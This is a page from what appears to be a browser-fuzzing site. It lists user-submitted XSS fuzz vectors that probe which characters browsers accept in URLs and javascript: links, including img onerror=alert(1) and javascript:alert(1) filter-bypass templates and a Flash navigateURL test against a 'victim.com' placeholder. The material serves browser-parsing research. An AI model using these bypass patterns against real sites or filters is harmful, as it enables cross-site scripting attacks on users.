
Featured vector
Chrome 0.0
<!-- sample vector --> <img src=xx:xx 0x0aonerror=alert(1)>
<!-- sample vector --> <img src=xx:xx 0x0aonerror=alert(1)>
Fuzz vector cloud
Anchor Attributes CSS Closing Comments HTML HTML5 JavaScript Property Protocol Script URL XSS attribute bla bypass challenge char comment data encoding entities entity event events flash for fun handler href img innerHTML navigateURL onload prompt properties regex space src string strings style svg tag tags test testing uri waf xml
3,424,392 Successful fuzzes
Fuzz Vectors
Searching for "URL"
Your browser identified asGeneral Crawlers unknown
All vectors
Description | Vector | Created by |
---|---|---|
Characters in between protocol in js url (FORK) XXX | <a href="javas*chr*cript:alert(1)" id="fuzzelement*num*">test</a> | @igc_iv |
testerdd | <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a>*num**num* | @script92538206 |
Unicode characters that normalize to a dot in URLs | <!-- sample vector --> <img src=//lel*chr*wtf/hey.jpg onload=logChr(*num*)> | @Lamp_AE |
Characters that can be used to terminate entities in an href | <a href="javascript&colon*chr*log(*num*)" id="fuzzelement*num*">test</a> | @tifkin_ |
Characters allowed after domain | <a href="http://google.com*chr*breakme" id="fuzzelement*num*">test</a> | @avlidienbrunn |
Characters allowed before http | <a href="http://*chr*google.com" id="fuzzelement*num*">test</a> | @avlidienbrunn |
Protocols before Javascript to run code by using Flash navigateURL | <script> setTimeout("if(document.getElementById('myframe*dataprotocols*').contentWindow.document.location.hash.substring(1)) customLog('*dataprotocols*');",1000) </script> <iframe id="myframe*dataprotocols*" src="http://victim.com/testme/flashtest/link_protocol_test.swf?input=*dataprotocols*javascript:document.location='http://shazzer.co.uk/%23@irsdl'"></iframe> | @irsdl |
Characters not encoded with encodeURIComponent | <script> chr=String.fromCharCode(*num*); result=''; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(*num*); } </script> | @garethheyes |
Characters not encoded with encodeURI | <script> chr=String.fromCharCode(*num*); result=''; try{ result=encodeURI(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(*num*); } </script> | @garethheyes |
Characters allowed before slashes no protocol | <a href="*chr*//google.com" id="fuzzelement*num*">test</a> | @garethheyes |
Characters allowed inside slashes no protocol | <a href="/*chr*/google.com" id="fuzzelement*num*">test</a> | @garethheyes |
Characters allowed instead of slash 2 | <a href="http:*chr**chr*google.com" id="fuzzelement*num*">test</a> | @garethheyes |
Characters allowed instead of slash | <a href="http:*chr*google.com" id="fuzzelement*num*">test</a> | @garethheyes |
Characters allowed after slash | <a href="http:/*chr*/google.com" id="fuzzelement*num*">test</a> | @garethheyes |
Characters allowed inside http | <a href="ht*chr*tp://google.com" id="fuzzelement*num*">test</a> | @garethheyes |
Characters allowed instead of forward slash in url | <a href="*chr**chr*google.com" id="fuzzelement*num*">test</a> | @garethheyes |
Characters allowed instead of colon in js url | <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> | @garethheyes |
Characters allowed after ampersand in named character references | <a href="javascript&*chr*colon;log(*num*)" id="fuzzelement*num*">test</a> | @_cweb |
Characters in between protocol in js url | <a href="javas*chr*cript:alert(1)" id="fuzzelement*num*">test</a> | @garethheyes |
Characters allowed before protocol in js url | <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a> | @garethheyes |
Characters allowed before colon in js url | <a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a> | @garethheyes |